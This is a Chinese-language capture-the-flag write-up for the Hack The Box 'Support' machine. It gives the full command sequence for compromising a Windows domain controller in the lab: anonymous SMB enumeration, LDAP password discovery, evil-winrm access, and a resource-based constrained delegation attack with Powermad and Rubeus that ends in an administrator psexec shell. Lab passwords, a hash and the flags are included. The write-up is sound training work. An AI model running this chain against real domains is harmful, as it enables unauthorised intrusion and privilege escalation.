文章

HTB Support

发表于 2026-02-12 更新于 2026-02- 12
作者 ENOCH
15~19 分钟 阅读

先nmap一下

# nmap -sS -sV -A -Pn 10.129.250.29
<...>
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-12 09:31:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
<...>

看到smb端口,空用户登录进去看看

# smbclient -N -L //10.129.250.29
​
    Sharename       Type      Comment
    ---------       ----      -------
    support-tools   Disk      support staff tools
    <...>

进入

$ smbclient -N //10.129.250.29/support-tools
smb: \> ls
  UserInfo.exe.zip                    A   277499  Wed Jul 20 12:01:07 2022

下载,测试exe,似乎无法使用

尝试逆向,得到密码nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

使用ldapsearch查找信息

ldapsearch -x -H ldap://10.129.250.29:389 -D [email protected] -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > userinfo

搜寻得到

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful

像是密码,登录成功

# evil-winrm -i 10.129.250.29 -u "support" -p 'Ironside47pleasure40Watchful'  
​
*Evil-WinRM* PS C:\Users\support\desktop> type user.txt
84439e34c3d3c18b2773ecaee9b4319d

接下来收集域内信息

bloodhound-python -u rsupport -p 'Ironside47pleasure40Watchful' -ns 10.129.250.29 -d support.htb -c All

查看

image-MIcK.png

发现[email protected] 属于 SHARED SUPPORT ACCOUNTS 组,这个组对整个 DC 有完全控制权限,可以打RBCD

上传Powermad,PowerView,Rubeus.exe

创建新机器账户并获取SID

New-MachineAccount -MachineAccount a -Password (ConvertTo-SecureString '123456' -AsPlainText -Force)
Get-ADComputer -identity a
#输出SID为S-1-5-21-1677581083-3380853377-188903654-6103
$ComputerSid = "S-1-5-21-1677581083-3380853377-188903654-6103"

构建SDDL,写入msDS-AllowedToActOnBehalfOfOtherIdentity属性

$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-ADComputer -Identity dc -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes}

获取rc4_hmac

.\Rubeus.exe hash /password:123456 /user:a$ /domain:support.htb
# [*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4

签发票据

.\Rubeus.exe s4u /user:a$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.suppor

得到base64字符串,保存为ticket.b64

cat ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

获取shell,拿flag

impacket-psexec support.htb/[email protected] -k -no-pass
C:\Users\Administrator\Desktop> type root.txt
55717432af1ba9bdd6b88d5a91d2732e

总结:学到了RBCD 攻击

hackthebox
wp
许可协议:  CC BY 4.0